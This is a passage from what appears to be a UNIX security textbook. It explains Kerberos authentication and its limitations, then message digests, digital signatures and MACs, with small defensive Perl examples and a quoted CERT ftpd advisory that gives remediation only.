Kerberos Server by demonstrating knowledge of her key.<br />

The fact that the Kerberos Server has access to the user's decrypted password is a result of the fact that<br />

Kerberos does not use public key cryptography. It is a serious disadvantage of the Kerberos system. It<br />

means that the Kerberos Server must be both physically secure and "computationally secure." The server<br />

must be physically secure to prevent an attacker from stealing the Kerberos Server and learning all of the<br />

users' passwords. The server must also be immune to login attacks: if an attacker could log onto the<br />

server and become root, that attacker could, once again, steal all of the passwords.<br />

Kerberos was designed so that the server can be stateless.[14] The Kerberos Server simply answers<br />

requests from users and issues tickets (when appropriate). This design makes it relatively simple to create<br />

replicated, secondary servers that can handle authentication requests when the primary server is down or<br />

otherwise unavailable. Unfortunately, these secondary servers need complete copies of the entire<br />

Kerberos database, which means that they must also be physically and computationally secure.<br />

[14] The server actually has a lot of permanent, sensitive state - the user passwords - but this<br />

is kept on the hard disk, rather than in RAM, and does not need to be updated during the<br />

course of Kerberos transactions.<br />

19.6.1.1 Initial login<br />

Logging into a <strong>UNIX</strong> workstation that is using Kerberos looks the same to a user as logging into a<br />

regular <strong>UNIX</strong> time-sharing computer. Sitting at the workstation, you see the traditional login: and<br />

password: prompts. You type your username and password, and if they are correct, you get logged in.<br />

Accessing files, electronic mail, printers, and other resources all work as expected.<br />

What happens behind the scenes, however, is far more complicated, and actually differs between the two<br />

different versions of Kerberos that are commonly available: Kerberos version 4 and Kerberos version 5.<br />

With Kerberos 4, the workstation sends a message to the Kerberos Authentication Server [15] after you<br />

type your username. This message contains your username and indicates that you are trying to log in.<br />

The Kerberos Server checks its database and, if you are a valid user, sends back a ticket granting ticket<br />

that is encrypted with your password. The workstation then asks you to type in your password and finally<br />

attempts to decrypt the encrypted ticket using the password that you've supplied. If the decryption is<br />

successful, the workstation then forgets your password, and uses the ticket granting ticket exclusively. If<br />

the decryption fails, the workstation knows that you supplied the wrong password and it gives you a<br />

chance to try again.[16]<br />

[15] According to the Kerberos papers and documentation, there are two Kerberos Servers:<br />

the Authentication Server and the Ticket Granting Service. Some commentators think that<br />

this is disingenuous, because all Kerberos systems simply have a single server, the Kerberos<br />

Server or Key Server.<br />


[16] Actually, the initial ticket that the Kerberos Server sends your workstation is encrypted<br />

with a 56-bit number that is derived from your password using a one-way cryptographic<br />

function.<br />

With Kerberos 5, the workstation waits until after you have typed your password before contacting the<br />

server. It then sends the Kerberos Authentication Server a message consisting of your username and the<br />

current time encrypted with your password. The Authentication Server looks up your username,<br />

determines your password, and attempts to decrypt the encrypted time. If the server can decrypt the<br />

current time, it then creates a ticket granting ticket, encrypts it with your password, and sends it to you.[17]<br />

[17] Why the change in protocol between Kerberos 4 and Kerberos 5? Under Kerberos 4,<br />

the objective of the designer was to minimize the amount of time that the user's password<br />

was stored on the workstation. Unfortunately, this made Kerberos 4 susceptible to offline<br />

password-guessing attacks. An attacker could simply ask a Kerberos Authentication Server<br />

for a ticket granting ticket for a particular user, then try to decrypt that ticket with every<br />

word in the dictionary. With Kerberos 5, the workstation must demonstrate to the Kerberos<br />

Authentication Server that the user knows the correct password. This is a more secure<br />

system, although the user's encrypted ticket granting ticket can still be intercepted as it is<br />

sent from the server to the workstation by an attacker and attacked with an exhaustive key<br />

search.<br />

Figure 19.3 shows a schematic of the initial Kerberos authentication.<br />

Figure 19.3: Initial Kerberos authentication<br />

What is this ticket granting ticket? It is a block of data that contains two pieces of information:

●   The session key: Kses
●   A ticket for the Kerberos Ticket Granting Service, encrypted with both the session key and the Ticket Granting Service's key: EKtgs{EKses{Ttgs}}

The user's workstation can now contact the Kerberos Ticket Granting Service to obtain tickets for any principal within the Kerberos realm - that is, the set of servers and users who are known to the Kerberos Server.

Note that:

●   Passwords are stored on the Kerberos Server, not on the individual workstations.


●   The user's password is never transmitted on the network--encrypted or otherwise.
●   The Kerberos Authentication Server is able to authenticate the user's identity, because the user knows the user's password.
●   The user is able to authenticate the Kerberos Server's identity, because the Kerberos Authentication Server knows the user's password.
●   An eavesdropper who intercepts the ticket sent to you from the Kerberos Server will get no benefit from the message, because it is encrypted using a key (your password) that the eavesdropper doesn't know. Likewise, an eavesdropper who intercepts the ticket sent from the Kerberos Server to the Ticket Granting Service will not be able to make use of the ticket because it is encrypted with the Ticket Granting Service's password.
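On most Kerberos installations you can also drive this process by hand with the MIT user commands; the exact options and output differ between Kerberos 4 and Kerberos 5, so treat this as a sketch:

% kinit
% klist
% kdestroy

kinit obtains a ticket granting ticket (prompting for your password), klist lists the tickets currently held in your credential cache, and kdestroy discards them, which is a good habit before you walk away from a shared workstation.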

19.6.1.2 Using the ticket granting ticket<br />

Once you have obtained a ticket granting ticket, you are likely to want to do something that requires the<br />

use of an authenticated service. For example, you probably want to read the files in your home directory.<br />

Under Sun Microsystems' regular version of NFS, once a file server exports its filesystem to a<br />

workstation, the server implicitly trusts whatever the workstation wants to do. If george is logged into the<br />

workstation, the server lets george access the files in his home directory. But if george becomes the<br />

superuser on his workstation, changes his UID to be that of bill, and starts accessing bill's files, the<br />

vanilla NFS server has no mechanism to detect this charlatanry or take evasive action.<br />

The scenario is very different when the NFS has been modified to use Kerberos.<br />

When the user first tries to access his files from a Kerberos workstation, system software on the<br />

workstation contacts the Ticket Granting Service and asks for a ticket for the File Server Service. The<br />

Ticket Granting Service sends the user back a ticket for the File Server Service. This ticket contains<br />

another ticket, encrypted with the File Server Service's password, that the user's workstation can present<br />

to the File Server Service to request files. The contained ticket includes the user's authenticated name, the<br />

expiration time, and the <strong>Internet</strong> address of the user's workstation. The user's workstation then presents<br />

this ticket to the File Server Service. The File Server Service decrypts the ticket using its own password,<br />

then builds a mapping between the (UID,IP address) of the user's workstation and a UID on the file<br />

server.<br />

As before, all of the requests and tickets exchanged between the workstation and the Ticket Granting<br />

Service are encrypted, protecting them from eavesdroppers.<br />

Figure 19.4: Workstation/file server/TGS communication<br />


The Ticket Granting Service was able to establish the user's identity when the user asked for a ticket for the File Service, because:

● The user's File Service Ticket request was encrypted using the session key, Kses.

● The only way the user could have learned the session key was by decrypting the original Ticket Granting Ticket that the user received from the Kerberos Authentication Server.

● To decrypt that original ticket, the user's workstation had to know the user's password. (Note again that this password was never transmitted over the network.)

The File Server Service was able to establish the user's identity because:

● The ticket that it receives requesting service from the user is encrypted with the File Server Service's own key.

● Inside that ticket is the IP address and username of the user.

● The only way for that information to have gotten inside the ticket was for the Ticket Granting Service to have put it there.

● Therefore, the Ticket Granting Service is sure of the user's identity.

● And that's good enough for the File Server Service.

After authentication takes place, the workstation uses the network service as usual.<br />

NOTE: Kerberos puts the time of day in the request to prevent an eavesdropper from<br />

intercepting the Request For Service request and retransmitting it from the same host at a<br />

later time. This sort of attack is called a playback or replay attack.<br />
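
As a rough illustration of the idea only (not the actual Kerberos implementation, which also keeps a replay cache of recently seen requests), a server can reject any request whose timestamp falls outside a small window. The window size and names in this Perl sketch are invented for the example:

use strict;

my $MAX_SKEW = 5 * 60;   # allowable clock skew in seconds (an assumed value)

# Return true if the timestamp embedded in a request is recent enough.
sub fresh_enough {
    my ($request_timestamp) = @_;
    return abs(time() - $request_timestamp) <= $MAX_SKEW;
}

print fresh_enough(time())        ? "accepted\n" : "rejected\n";
print fresh_enough(time() - 3600) ? "accepted\n" : "rejected (stale - possible replay)\n";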

19.6.1.3 Authentication, data integrity, and secrecy<br />

Kerberos is a general-purpose system for sharing secret keys between principals on the network.<br />

Normally, Kerberos is used solely for authentication. However, the ability to exchange keys can also be<br />

used to ensure data integrity and secrecy.<br />

If eavesdropping is an ongoing concern, all information transmitted between the workstation and the<br />

service can be encrypted using a key that is exchanged between the two principals. Unfortunately,<br />

encryption carries a performance penalty. At MIT's Project Athena, encryption is used for transmitting<br />

highly sensitive information such as passwords, but is not used for most data transfer, such as files and<br />


electronic mail.<br />

NOTE: For single-user workstations, Kerberos provides significant additional security<br />

beyond that of regular passwords. If two people are logged into the workstation at the same<br />

time, then the workstation will be authenticated for both users. These users can then pose as<br />

each other. This threat is so significant that at MIT's Project Athena, network services such<br />

as rlogind and telnetd are disabled on workstations to prevent an attacker from logging in<br />

while a legitimate user is authenticated. It is also possible for someone to subvert the local<br />

software to capture the user's password as it is typed (as with a regular system).<br />

In early 1996, graduate students with the COAST Laboratory at Purdue University discovered a<br />

long-standing weakness in the key generation for Kerberos 4. The weakness allows an attacker to guess<br />

session keys in a matter of seconds. A patch has been widely distributed; be sure to install it if you are<br />

using Kerberos 4.<br />

19.6.1.4 Kerberos 4 vs. Kerberos 5<br />

Kerberos has gone through 5 major revisions during its history to date. Currently, as we've mentioned,<br />

there are two versions of Kerberos in use in the marketplace.<br />

Kerberos 4 is more efficient than Kerberos 5, but more limited. For example, Kerberos 4 can only work<br />

over TCP/IP networks. Kerberos 4 has a large installed base, but there is increasing support for Kerberos<br />

5.<br />

Kerberos 5 fixes minor problems with the Kerberos protocol, making it more resistant to determined<br />

attacks over the network. Kerberos 5 is also more flexible: it can work with different kinds of networks.<br />

Kerberos 5 also has provisions for working with encryption schemes other than DES, although there are<br />

(as of this writing) no implementations that use alternative encryption algorithms.<br />

Finally, Kerberos 5 supports delegation of authentication, ticket expirations longer than 21 hours,<br />

renewable tickets, tickets that will work sometime in the future, and many more options.<br />

19.6.2 Kerberos vs. Secure RPC

Kerberos is an authentication system, not an RPC system. Kerberos can be used with a variety of RPC<br />

schemes: versions of Kerberos are available for Sun RPC and for the X Window System (which has its<br />

own RPC specifically designed for network window systems). But Kerberos can also be used simply for<br />

exchanging keys. For example, there is a version of the telnet command that uses Kerberos to exchange a<br />

cryptographic key. MIT also modified the NFS protocol to work with Kerberos; the modification was a<br />

simple kernel patch to the NFS server that maintained a mapping between authenticated users on discrete<br />

hosts and UIDs on the NFS server.

There are other important differences between Kerberos and Secure RPC:

● Secure RPC passwords are based on public key cryptography, not secret key cryptography. When the user wishes to prove her identity to the NIS server, she encrypts an authenticator and sends it to the Secure RPC server, which then decrypts her authenticator using the user's widely available public key. With Kerberos, identity is proven by knowledge of the secret key.

● Secure RPC stores both the user's secret key and public key on the NIS server. The secret key is encrypted with the user's password and made available to the network, but the network does not have the ability to decrypt it. Thus, with Secure RPC, there is no need for a specially secured "authentication server" to establish the identity of users on the network.

● Secure RPC is built into Sun's RPC system. Whereas Kerberos requires that each application be specifically tailored, Secure RPC is a transparent modification to Sun's low-level RPC that works with any RPC-based service. Any application can use it simply by requesting AUTH_DES authentication.[18]

[18] If you are using recent versions of Sun's Solaris operating system, you can specify Kerberos authentication by requesting AUTH_KERB.

Kerberos is an add-on system that can be used with any existing network protocol. Project Athena uses<br />

Kerberos with NFS, remote login, password changing, and electronic mail. Sun Microsystems has added<br />

compatibility with Kerberos to its RPC system. Other software vendors, including the Open Software<br />

Foundation and IBM, have used the ideas pioneered by Kerberos as the basis of their own network<br />

security offerings.<br />

19.6.3 Installing Kerberos<br />

Installing Kerberos is a complicated process that depends on the version of Kerberos you have, the kind<br />

of computer, and the version of your computer's operating system. It's a difficult task that requires that<br />

you either have the source code for your computer system, or that you have source code for replacement<br />

programs. It is not a task to be undertaken lightly.<br />

Fortunately, you increasingly don't have to. Kerberos or Kerberos-like security systems are now available

from several companies, as well as being a standard part of several operating systems. These days, there<br />

is no reason to be running anything but secure network services.<br />

The Kerberos source code is available for the cost of reproduction from MIT; the address and ordering<br />

information are provided in Appendix E, Electronic Resources. Alternatively, you may use FTP to<br />

transfer the files over the Internet from the computer athena-dist.mit.edu.[19]

[19] Because of export restrictions, only U.S. and Canadian citizens may do so legally.<br />

As the changes required to your system's software are substantial and subject to change, the actual<br />

installation process will not be described here. See the documentation provided with Kerberos for details.<br />

19.6.4 Using Kerberos<br />

Using a workstation equipped with Kerberos is only slightly different from using an ordinary<br />

workstation. In the Project Athena environment, all of the special Kerberos housekeeping functions are<br />

performed automatically: when the user logs in, the password typed is used to acquire a Kerberos ticket,<br />

which in turn grants access to the services on the network. Additional tickets are automatically requested<br />

as they are needed. Tickets for services are automatically cached in the /tmp directory. All of a user's<br />

tickets are automatically destroyed when the user logs out.<br />


But Kerberos isn't entirely transparent. If you are logged into a Kerberos workstation for more than eight<br />

hours, something odd happens: network services suddenly stop working properly. The reason for this is<br />

that tickets issued by Kerberos expire after eight hours, a technique designed to prevent a "replay" attack.<br />

(In such an attack, somebody who captured one of your tickets would then sit down at your workstation after

you leave, using the captured ticket to gain access to your files.) Thus, after eight hours, you must run the<br />

kinit program, and provide your username and password for a second time, to be issued a new ticket for<br />

the Kerberos Ticket Granting Service.<br />

19.6.5 Kerberos Limitations<br />

Although Kerberos is an excellent solution to a difficult problem, it has several shortcomings:

● Every network service must be individually modified for use with Kerberos. Because of the Kerberos design, every program that uses Kerberos must be modified. The process of performing these modifications is often called "Kerberizing" the application. The amount of work that this entails depends entirely on the application program. Of course, to Kerberize an application, you must have the application's source code.

● Kerberos doesn't work well in a time-sharing environment. Kerberos is designed for an environment in which there is one user per workstation. Because of the difficulty of sharing data between different processes running on the same UNIX computer, Kerberos keeps tickets in the /tmp directory. If a user is sharing the computer with several other people, it is possible that the user's tickets can be stolen, that is, copied by an attacker. Stolen tickets can then be used to obtain fraudulent service.

● Kerberos requires a secure Kerberos Server. By design, Kerberos requires that there be a secure central server that maintains the master password database. To ensure security, a site should use the Kerberos Server for absolutely nothing beyond running the Kerberos Server program. The Kerberos Server must be kept under lock and key, in a physically secure area. In some environments, maintaining such a server is an administrative and/or financial burden.

● Kerberos requires a continuously available Kerberos Server. If the Kerberos Server goes down, the Kerberos network is unusable.

● Kerberos stores all passwords encrypted with a single key. Adding to the difficulty of running a secure server is the fact that the Kerberos Server stores all passwords encrypted with the server's master key, which happens to be located on the same hard disk as the encrypted passwords. This means that, in the event the Kerberos Server is compromised, all user passwords must be changed.

● Kerberos does not protect against modifications to system software (Trojan horses). Kerberos does not have the computer authenticate itself to the user - that is, there is no way for a user sitting at a computer to determine whether the computer has been compromised. This failing is easily exploited by a knowledgeable attacker.[20] An intruder, for example, can modify the workstation's system software so that every username/password combination typed is recorded automatically or sent electronically to another machine controlled by the attacker. Alternatively, a malicious attacker can simply modify the workstation's software to spuriously delete the user's files after the user has logged in and authenticated himself to the File Server Service. Both of these problems are consequences of the fact that, even in a networked environment, many workstations (including Project Athena's) contain local copies of the programs that they run.

[20] In fact, Trojan horses were a continuing problem at MIT's Project Athena.

● Kerberos may result in a cascading loss of trust. Another problem with Kerberos is that if a server password or a user password is broken or otherwise disclosed, it is possible for an eavesdropper to use that password to decrypt other tickets and use this information to spoof servers and users.

Kerberos is a workable system for network security, and it is still widely used. But more importantly, the principles behind Kerberos are increasingly incorporated into network security systems that are available directly from vendors.


Chapter 6<br />

Cryptography<br />

6.5 Message Digests and Digital Signatures<br />

A message digest (also known as a cryptographic checksum or cryptographic hashcode) is nothing more than a<br />

number - a special number that is effectively a hashcode produced by a function that is very difficult to reverse.<br />

A digital signature is (most often) a message digest encrypted with someone's private key to certify the contents. This<br />

process of encryption is called signing. Digital signatures can perform two different functions, both very important to<br />

the security of your system:<br />

● Integrity - A digital signature indicates whether a file or a message has been modified.

● Authentication - A digital signature makes it possible to mathematically verify the name of the person who signed the message.

A third function that is quite valuable in some contexts is called non-repudiation. Non-repudiation means that after<br />

you have signed and sent a message, you cannot later claim that you did not sign the original message. You cannot<br />

repudiate your signature, because the message was signed with your private key (which, presumably, no one else has).<br />

We'll outline the first two of these concepts here, and refer to them in later chapters (and especially in Chapter 9,<br />

Integrity Management). Non-repudiation is not of major concern to us here, although it is important in many other<br />

contexts, especially that of email.<br />

6.5.1 Message Digests<br />

A simple hash function takes some input, usually of indefinite length, and produces a small number that is<br />

significantly shorter than the input. The function is many to one, in that many (possibly infinite) inputs may generate<br />

the same output value. The function is also deterministic in that the same output value is always generated for<br />

identical inputs. Hash functions are often used in mechanisms that require fast lookup for various inputs, such as<br />

symbol tables in compilers and spelling checkers.<br />

A message digest is also a hash function. It takes a variable length input - often an entire disk file - and reduces it to a<br />

small value (typically 128 to 512 bits). Give it the same input, and it always produces the same output. And, because<br />

the output is very much smaller than the potential input, for at least one of the output values there must be more than<br />

one input value that can produce it; we would expect that to be true for all possible output values for a good message<br />

digest algorithm.<br />

There are two other important properties of good message digest algorithms. The first is that the algorithm cannot be<br />

predicted or reversed. That is, given a particular output value, we cannot come up with an input to the algorithm that<br />

will produce that output, either by trying to find an inverse to the algorithm, or by somehow predicting the nature of<br />

the input required. With at least 128 bits of output, a brute force attack is pretty much out of the question, as there will<br />

be 1.7 x 10^38 possible input values of the same length to try, on average, before finding one that generates the correct

output. Compare this with some of the figures given in "Strength of RSA" earlier in this chapter, and you'll see that<br />

this task is beyond anything anyone would be able to try with current technology. With numbers as large as these, the<br />

idea that any two different documents produced at random during the course of human history would have the same<br />


128-bit message digest is unlikely!<br />

The second useful property of message digest algorithms is that a small change in the input results in a significant<br />

change in the output. Change a single input bit, and roughly half of the output bits should change. This is actually a<br />

consequence of the first property, because we don't want the output to be predictable based on the input. However, this<br />

aspect is a valuable property of the message digest all by itself.<br />
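
A few lines of Perl make this property easy to see for yourself; the sketch below assumes the Digest::MD5 module that ships with modern Perl, and the sample string is arbitrary. Flipping a single bit of the input changes roughly half of the 128 output bits:

use strict;
use Digest::MD5 qw(md5);

my $original = "The quick brown fox jumps over the lazy dog";
my $modified = $original;
substr($modified, 0, 1) = chr(ord(substr($modified, 0, 1)) ^ 1);  # flip one input bit

# XOR the two 16-byte digests and count the bits that differ.
my $changed = unpack("%32b*", md5($original) ^ md5($modified));
print "bits changed out of 128: $changed\n";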

6.5.2 Using Message Digests<br />

Given the way that a message digest works, you can understand how it can be used as an authentication system for anyone who is distributing digital documents: simply publish your documents electronically, distribute them on the Internet, and for each document also publish its message digest. Then, if you want to be sure that the copy of the document you download from the Internet is an unaltered copy of the original, simply recalculate the document's message digest and compare it with the one for the document that you published. If they match, you know you've got the same document as the original.
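
For example, a short Perl script along the following lines recomputes a file's MD5 and compares it with a published value. This is only a sketch: it assumes the Digest::MD5 module and takes the filename and the published digest as command-line arguments.

#!/usr/bin/perl
use strict;
use Digest::MD5;

my ($file, $published) = @ARGV;
open(my $fh, '<', $file) or die "cannot open $file: $!\n";
binmode($fh);

my $md5 = Digest::MD5->new;
$md5->addfile($fh);                 # feed the entire file to the digest
my $digest = $md5->hexdigest;

if ($digest eq lc($published)) {
    print "MD5 matches: $digest\n";
} else {
    print "MISMATCH!\n  computed:  $digest\n  published: $published\n";
}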

In fact, the Computer Emergency Response Team (CERT) does this via the Internet when they distribute patches and bug fixes for security-related problems. The following is a portion of a 1994 message from CERT advising recipients to replace the FTP programs on their computers with more secure versions:

Date: Thu, 14 Apr 94 16:00:00 EDT<br />

Subject: CERT Advisory CA-94:08.ftpd.vulnerabilities<br />

To: cert-advisory-request@cert.org<br />

From: cert-advisory@cert.org (CERT Advisory)<br />

Organization: CERT Coordination Center<br />

Address: Software Engineering Institute<br />

Carnegie Mellon University<br />

Pittsburgh, Pennsylvania 15213-3890<br />

=======================================================================<br />

CA-94:08 CERT Advisory<br />

April 14, 1994<br />

ftpd Vulnerabilities<br />

-----------------------------------------------------------------------<br />

The CERT Coordination Center has received information concerning two<br />

vulnerabilities in some ftpd implementations. The first is a<br />

vulnerability with the SITE EXEC command feature of the FTP daemon<br />

(ftpd) found in versions of ftpd that support the SITE EXEC feature.<br />

This vulnerability allows local or remote users to gain root access.<br />

The second vulnerability involves a race condition found in the ftpd<br />

implementations listed in Section I. below. This vulnerability allows

local users to gain root access.<br />

Sites using these implementations are vulnerable even if they do not<br />

support anonymous FTP.<br />

II. Impact<br />

Anyone (remote or local) can gain root access on a host running a<br />

vulnerable FTP daemon. Support for anonymous FTP is not required<br />

to exploit this vulnerability.<br />

. . .

III. Solution<br />

Affected sites can solve both of these problems by upgrading to<br />

the latest version of ftpd. These versions are listed below. Be<br />

certain to verify the checksum information to confirm that you<br />

have retrieved a valid copy.<br />

If you cannot install the new version in a timely manner, you<br />

should disable FTP service until you have corrected this problem.<br />

It is not sufficient to disable anonymous FTP. You must disable<br />

the FTP daemon.<br />

For wuarchive ftpd, you can obtain version 2.4 via anonymous<br />

FTP from wuarchive.wustl.edu, in the "/packages/wuarchive-ftpd"<br />

directory. If you are currently running version 2.3, a patch<br />

file is available.<br />

                    BSD        SVR4
File                Checksum   Checksum    MD5 Digital Signature
-----------------   --------   ---------   --------------------------------
wu-ftpd2.4.tar.Z    38213 181  20337 362   cdcb237b71082fa23706429134d8c32e
patch_2.3-2.4.Z     09291 8    51092 16    5558a04d9da7cdb1113b158aff89be8f

. . .<br />

As you can tell from the tone of the message, CERT considers the security problem to be extremely serious: anyone on the Internet could break into a computer running a particular ftpd program and become the superuser! CERT had a fix for this bug, but rather than distribute it to each site individually, they identified a principal site with the fix (wuarchive.wustl.edu) and advised people to download the fix.

MD5 is a commonly used message-digest algorithm. CERT publishes the MD5 "digital signature" of the files so that people can verify the authenticity of the patch before they install it. After receiving the message from CERT and downloading the patch, system administrators are supposed to compute the MD5 of the binary. This process provides two indications.

1. If the MD5 of the binary matches the one published in the CERT message, a system administrator knows the file wasn't damaged during the download.

2. More importantly, if the two MD5 codes match, a system administrator can be certain that hackers haven't broken into the computer wuarchive.wustl.edu and replaced the patch with a program that contains security holes.

Although CERT's interest in security is commendable, there is an important flaw in this approach. Nothing guarantees<br />

that the CERT message itself isn't forged. In other words, any hacker with sufficient skill to break into an anonymous<br />

FTP repository and play switcheroo with the binaries might also be able to send a forged email message to CERT's<br />

mailing lists telling system administrators to install new (and faulty) software. Unsuspecting administrators would<br />

receive the email message, download the patch, check the MD5 codes, and install the software - creating a new<br />

security hole for the hackers to exploit.<br />

CERT's problem, then, is this: while the MD5 code in the email message is a signature for the patch, there is no<br />

signature for the message from CERT itself! There is no way to verify that the CERT message is authentic.<br />


CERT personnel are aware of the problem that alerts can be forged. For this reason, CERT uses digital signatures for<br />

all its alerts available via anonymous FTP from the computer ftp.cert.org. For each alert, you find a file with an .asc<br />

file extension, which contains a digital signature. Unfortunately, CERT (at this time) does not distribute its alerts with<br />

the digital signature at the bottom of the message, which would make things easier for everybody.<br />

6.5.3 Digital Signatures<br />

As we pointed out in the last section, a message digest function is only half of the solution to creating a reliable digital<br />

signature. The other half is public key encryption - only run in reverse.<br />

Recall that when we introduced public key encryption earlier in this chapter, we said that it depends on two keys:<br />

Public key<br />

A key that is used for encrypting a secret message. Normally, the public key is widely published.<br />

Secret key

A key that is kept secret, for decrypting messages once they are received.<br />

By using a little bit of mathematical gymnastics, you can run the public key algorithm in reverse. That is, you could<br />

encrypt messages with your secret key; these messages can then be decrypted by anyone who possesses your public<br />

key. Why would anyone want to do this? Each public key has one and only one matching secret key. If a particular<br />

public key can decrypt a message, you can be sure that the matching secret key was used to encrypt it. And that is how<br />

digital signatures work.<br />

When you apply your secret key to a message, you are signing it. By using your secret key and the message digest<br />

function, you are able to calculate a digital signature for the message you're sending. In principle, a public key<br />

algorithm could be used without a message digest algorithm: we could encrypt the whole message with our private<br />

key. However, every public key algorithm in use requires a large amount of processor time to encrypt even<br />

moderate-size inputs. Thus, to sign a multi-megabyte file might take hours or days if we only used the public key<br />

encryption algorithm.<br />

Instead, we use a fast message digest algorithm to calculate a hash value, and then we sign that small hash value with<br />

our secret key. When you, the recipient, get that small value, you can decrypt the hash value using our public key. You<br />

can also recreate the hash value from the input. If those two values match, you are assured that you got the same file<br />

we signed.<br />
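
The digest-then-sign flow can be sketched in a few lines of Perl, assuming the CPAN module Crypt::OpenSSL::RSA is installed (it is not part of the standard Perl distribution), and with a placeholder message string standing in for the real file contents:

use strict;
use Crypt::OpenSSL::RSA;

my $message = "contents of the file being distributed";

# Generate a key pair just for the example; a real signer would load an
# existing private key instead.
my $rsa = Crypt::OpenSSL::RSA->generate_key(2048);
$rsa->use_md5_hash();                 # sign the MD5 digest of the message

my $signature = $rsa->sign($message);

# The recipient needs only the public key to check the signature.
my $pub = Crypt::OpenSSL::RSA->new_public_key($rsa->get_public_key_string());
$pub->use_md5_hash();
print $pub->verify($message, $signature) ? "signature good\n" : "signature BAD\n";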

The most common digital signature in use today is the combination of the MD5 message digest algorithm and the<br />

RSA public key encryption mechanism. Another likely possibility is to use the SHA (Secure Hash Algorithm) and

ElGamal public-key mechanism; together, these two algorithms form the NIST DSA - Digital Signature Algorithm.<br />

6.5.4 Common Digest Algorithms<br />

There are many message-digest functions available today. All of them work in roughly the same way, but they differ<br />

in speed and specific features. Details of these functions may be found in the references in Appendix D.<br />

6.5.4.1 MD2, MD4, and MD5<br />

One of the most widely used message digest functions is the MD5 function, which was developed by Ronald Rivest, is<br />

distributed by RSA Data <strong>Sec</strong>urity, and may be used freely without license costs. It is based on the MD4 algorithm,<br />

which in turn was based on the MD2 algorithm.<br />

The MD2, MD4, and MD5 message digest functions all produce a 128-bit number from a block of text of any length.<br />

Each of them pads the text to a fixed-block size, and then each performs a series of mathematical operations on<br />

successive blocks of the input.<br />


MD2 was designed by Ronald Rivest and published in RFC 1319. There are no known weaknesses in it, but it is very<br />

slow. To create a faster message digest, Rivest developed MD4, which was published in Internet RFCs 1186 and

1320. The MD4 algorithm was designed to be fast, compact, and optimized for machines with "little-endian"<br />

architectures.<br />

Some potential attacks against MD4 were published in the cryptographic literature, so Dr. Rivest developed the MD5<br />

algorithm, published in RFC 1321.[21] It was largely a redesign of MD4, and includes one more round of internal<br />

operations and several significant algorithmic changes. Because of the changes, MD5 is somewhat slower than MD4.<br />

However, it is more widely accepted and used than the MD4 algorithm.<br />

[21] Internet RFCs are a form of open standards documents. They can be downloaded or mailed, and they describe a common set of protocols and data structures for interoperability.

As of early 1996, significant flaws have been discovered in MD4. As a result, the algorithm should not be used.<br />

6.5.4.2 SHA<br />

The Secure Hash Algorithm was developed by NIST with some assistance from the NSA. The algorithm appears to be

closely related to the MD4 algorithm, except that it produces an output of 160 bits instead of 128. Analysis of the<br />

algorithm reveals that some of the differences from the MD4 algorithm are similar in purpose to the improvements<br />

added to the MD5 algorithm (although different in nature).<br />

6.5.4.3 HAVAL<br />

The HAVAL algorithm is a modification of the MD5 algorithm, developed by Yuliang Zheng, Josef Pieprzyk, and<br />

Jennifer Seberry. It can be modified to produce output hash values of various lengths, from 92 bits to 256. It also has<br />

an adjustable number of "rounds" (application of the internal algorithm). The result is that HAVAL can be made to<br />

run faster than MD5, although there may be some corresponding decrease in the strength of the output. Alternatively,<br />

HAVAL can be tuned to produce larger and potentially more secure hash codes.[22]<br />

[22] You should note that merely having longer hash values does not necessarily make a message digest<br />

algorithm more secure.<br />

6.5.4.4 SNEFRU<br />

SNEFRU was designed by Ralph Merkle to produce either 128-bit or 256-bit hash codes. The algorithm can also be<br />

run with a variable number of "rounds" of the internal algorithm. However, analysis by several cryptographers has<br />

shown that SNEFRU has weaknesses that can be exploited, and that you can find arbitrary messages that hash to a<br />

given 128-bit value if the 4-round version is used. Dr. Merkle currently recommends that only 8-round SNEFRU be<br />

used, but this algorithm is significantly slower than the MD5 or HAVAL algorithms.<br />

6.5.5 Other Codes<br />

For the sake of completeness, we will describe two other types of "signature" functions.<br />

6.5.5.1 Checksums<br />

A checksum is a function that is calculated over an input to determine if that input has been corrupted. Most often,<br />

checksums are used to verify that data communications over a modem or network link have not undergone "bit-rot," or<br />

random changes from noise. They may also be built into storage controllers to perform checks on data moved to and<br />

from media: if a checksum doesn't agree with the data, then there may be a problem on the disk or tape.<br />

Checksums are usually calculated as simple linear or polynomial functions over their input, and result in small values<br />

(16 or 32 bits). CRC polynomials, or cyclic-redundancy checksums, are a particular form of checksum that are<br />


commonly used. The sum command in UNIX will generate a CRC checksum, although there appear to be at least three major versions of sum available on modern UNIX systems, and they do not generate the same values!

Checksums are easy to calculate, and are simple to fool. You can alter a file in such a way that it has the same simple<br />

checksum as before the alteration. In fact, many "hacker toolkits" circulating in the hacker underground have tools to<br />

recreate sum output for system commands after they have been modified! Thus, checksums should never be used as a<br />

verification against malicious tampering.<br />
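
To see just how simple such a function can be, here is a toy 16-bit additive checksum in Perl. It is our own illustration of the style of checksum discussed above, not the algorithm used by any particular sum implementation:

use strict;

# Sum the bytes of the input modulo 2**16.
sub additive_checksum {
    my ($data) = @_;
    my $sum = 0;
    $sum = ($sum + ord($_)) & 0xFFFF for split //, $data;
    return $sum;
}

printf "checksum: %u\n", additive_checksum("some file contents");
# An attacker can append or adjust bytes to cancel out a change, leaving the
# checksum identical - which is why it is useless against deliberate tampering.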

6.5.5.2 Message authentication codes<br />

Message Authentication Codes, or MACs,[23] are basically message digests with a password thrown in. The intent is

that the MAC cannot be recreated by someone with the same input unless that person also knows the secret key<br />

(password). These may or may not be safer than a simple message digest - depending on the algorithm used, the<br />

strength of the key, and the length of the output MAC.<br />

[23] Not to be confused with the Mandatory Access Control, whose acronym is also MAC.<br />

One simple form of MAC appends the message to the key and then generates a message digest. Because the key is<br />

part of the input, it alters the message digest in a way that can be recreated. Because two keys will generate very<br />

different output for the same data input, we achieve our goal of a password-dependent MAC.<br />
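
A minimal Perl sketch of this construction, using Digest::MD5, appears below. The key and message strings are invented for the example, and modern practice favors the HMAC construction over a bare keyed digest, but the idea is the same:

use strict;
use Digest::MD5 qw(md5_hex);

# MAC = digest of (secret key prepended to the message).
sub simple_mac {
    my ($key, $message) = @_;
    return md5_hex($key . $message);
}

my $message = "transfer 100 dollars to account 42";
print "MAC:                ", simple_mac("my secret key", $message), "\n";

# A different key produces an unrelated MAC for the same message.
print "MAC with wrong key: ", simple_mac("a bad guess", $message), "\n";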

A second form of MAC uses some form of stream encryption method, such as RC4 or DES in CFB mode. The key in<br />

this case is the encryption password, and the MAC is the last block of bits from the encryption algorithm. As the<br />

encryption output depends on all the bits of input and the secret password, the last block of the output will be different<br />

for a different input or a different password. However, if the encryption block size is small (e.g., 64 bits), the MAC<br />

